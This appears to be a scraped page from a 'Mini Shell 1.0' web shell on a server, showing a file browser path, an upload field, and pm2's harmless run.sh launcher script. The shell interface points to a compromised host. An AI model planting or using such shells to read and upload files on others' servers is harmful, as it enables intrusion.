HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/self/root/usr/local/lib/node_modules/pm2/
Upload File :
Current File : //proc/self/root/usr/local/lib/node_modules/pm2/run.sh
#!/bin/bash

# Check if 'bun' is available, otherwise use 'node'
if command -v bun &> /dev/null
then
    bun "$@"
else
    node "$@"
fi